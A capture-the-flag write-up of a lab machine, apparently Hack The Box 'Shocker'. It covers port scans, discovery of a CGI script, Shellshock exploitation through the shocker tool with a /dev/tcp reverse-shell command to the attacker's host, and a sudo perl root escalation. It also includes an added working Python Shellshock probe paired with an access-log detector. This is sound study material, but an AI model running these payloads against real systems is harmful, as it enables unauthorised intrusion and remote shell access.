Nmap scan for basic ports:

```
# Nmap 7.70 scan initiated Thu Jul 4 19:01:39 2019 as: nmap -oN T-common 10.10.10.56
Nmap scan report for 10.10.10.56
Host is up (0.25s latency).
Not shown: 998 closed ports
PORT     STATE SERVICE
80/tcp   open  http
2222/tcp open  EtherNetIP-1
# Nmap done at Thu Jul 4 19:01:42 2019 -- 1 IP address (1 host up) scanned in 3.01 seconds
```
Detailed scan of the open ports:

```
# Nmap 7.70 scan initiated Thu Jul 4 19:02:04 2019 as: nmap -sV -sC -p 80,2222 -oN O-Detailed 10.10.10.56
Nmap scan report for 10.10.10.56
Host is up (0.23s latency).
PORT     STATE SERVICE VERSION
80/tcp   open  http    Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Site doesn't have a title (text/html).
2222/tcp open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.2 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   2048 c4:f8:ad:e8:f8:04:77:de:cf:15:0d:63:0a:18:7e:49 (RSA)
|   256 22:8f:b1:97:bf:0f:17:08:fc:7e:2c:8f:e9:77:3a:48 (ECDSA)
|_  256 e6:ac:27:a3:b5:a9:f1:12:3c:34:a5:5d:5b:eb:3d:e9 (ED25519)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Thu Jul 4 19:02:18 2019 -- 1 IP address (1 host up) scanned in 14.65 seconds
```
One peculiar thing to note is that the SSH port has been moved to 2222 rather than the usual 22; the basic scan only labels it "EtherNetIP-1" because that is what the nmap services table lists for 2222, and the version scan is what identifies it as OpenSSH.

Running dirb against the HTTP server first got us a directory, cgi-bin, and running dirb again inside it fetched us a file named user.sh. The script displayed the server's uptime. After some research, and going by the name of the box, I was very positive that this might involve Shellshock: a CGI script executed by a vulnerable bash will run code smuggled in through any request header the web server turns into an environment variable.
I found a tool online that automates the job: https://github.com/nccgroup/shocker. Here -H is the target host, -c the CGI script to hit and --command the payload to run once the header is evaluated by bash:

```
python shocker.py -H 10.10.10.56 --command "/bin/bash -i > /dev/tcp/10.10.14.13/9090 0<&1 2>&1" -c /cgi-bin/user.sh
```
With a listener waiting on port 9090 of my machine, this got me a reverse bash shell and I was able to cat the flag.

```
> cat /home/shell/user.txt
2ec24***
```
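To show what a tool like shocker does under the hood, here is an added example (not the writeup's own code and not the shocker project's): it builds the Shellshock request for a CGI script, checks the response for proof that the command actually ran rather than the header merely being echoed, and, on the defensive side, flags the same payload prefix in Apache access-log lines. The function names, the marker string and the sample log lines are all constructed for this illustration.

```python
#!/usr/bin/env python3
"""Hand-rolled Shellshock (CVE-2014-6271) probe for a CGI endpoint.

Added illustration; the names below (build_shellshock_headers,
parse_response, probe, detect_in_access_log, SHELLSHOCK_MARKER) are
assumptions, not an API from the writeup or from the shocker tool.
"""
import re
import sys
import urllib.error
import urllib.request
from typing import List, Optional

# A unique string the target is asked to echo. Seeing it in the body proves
# our text was executed by bash on the server, not just reflected.
SHELLSHOCK_MARKER = "SHOCKER_MARKER_0xDEADBEEF"

# The function-definition prefix that vulnerable bash misparses.
SHELLSHOCK_RE = re.compile(r"\(\)\s*\{")


def build_shellshock_headers(command: str) -> dict:
    """Return HTTP headers carrying a Shellshock payload.

    Apache hands request headers to a CGI script as environment variables
    (User-Agent -> HTTP_USER_AGENT). A vulnerable bash imports a value that
    starts with "() {" as a function definition and keeps executing what
    follows the closing brace. The leading "echo;" emits the blank line that
    ends the CGI header block, so everything after it is returned as body
    instead of producing a 500 for a malformed header.
    """
    payload = f"() {{ :; }}; echo; echo {SHELLSHOCK_MARKER}; {command}"
    # Send it in more than one header in case only some are exported to the environment.
    return {"User-Agent": payload, "Referer": payload}


def parse_response(body: str) -> Optional[str]:
    """Return the text that follows the marker line, or None if nothing ran."""
    _head, sep, tail = body.partition(SHELLSHOCK_MARKER + "\n")
    return tail if sep else None


def probe(url: str, command: str, timeout: float = 10.0) -> Optional[str]:
    """Send the payload to a CGI URL and return the command output (None if not vulnerable)."""
    req = urllib.request.Request(url, headers=build_shellshock_headers(command))
    try:
        with urllib.request.urlopen(req, timeout=timeout) as resp:
            body = resp.read().decode("utf-8", errors="replace")
    except urllib.error.HTTPError as err:
        # A 500 can still carry our output; read the error body rather than giving up.
        body = err.read().decode("utf-8", errors="replace")
    return parse_response(body)


def detect_in_access_log(lines: List[str]) -> List[int]:
    """Return 1-based indexes of Apache combined-log lines carrying a Shellshock prefix.

    The combined format logs Referer and User-Agent, so the "() {" prefix
    survives into the log even when the request itself was never blocked.
    """
    return [n for n, line in enumerate(lines, 1) if SHELLSHOCK_RE.search(line)]


# Constructed sample log lines (not taken from the target) for the detector.
SAMPLE_LOG = [
    '10.10.14.13 - - [04/Jul/2019:19:05:11 +0000] "GET /cgi-bin/user.sh HTTP/1.1" 200 118 "-" "Mozilla/5.0"',
    '10.10.14.13 - - [04/Jul/2019:19:06:02 +0000] "GET /cgi-bin/user.sh HTTP/1.1" 200 342 "-" '
    '"() { :; }; echo; /bin/bash -i > /dev/tcp/10.10.14.13/9090 0<&1 2>&1"',
]


if __name__ == "__main__":
    if len(sys.argv) != 3:
        print(f"usage: {sys.argv[0]} http://HOST/cgi-bin/script.sh 'command'")
        sys.exit(1)
    output = probe(sys.argv[1], sys.argv[2])
    print("not vulnerable (marker never came back)" if output is None else output)
    print("log lines with Shellshock prefix:", detect_in_access_log(SAMPLE_LOG))
```

The marker is the important part: a CGI script that simply prints its environment would reflect the header text without executing it, so grepping the response for the payload itself is not evidence of code execution, while the echoed marker is.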
Running sudo -l on the machine showed that I can run /usr/bin/perl as root without a password. I went over to GTFOBins and found that I can get a shell with:

```
sudo perl -e 'exec "/bin/sh";'
```

This got me a root shell, and hence the root flag.

```
> cat /root/root.txt
52c27***
```
I had never heard of Shellshock being used against a web server before, so I learnt something new.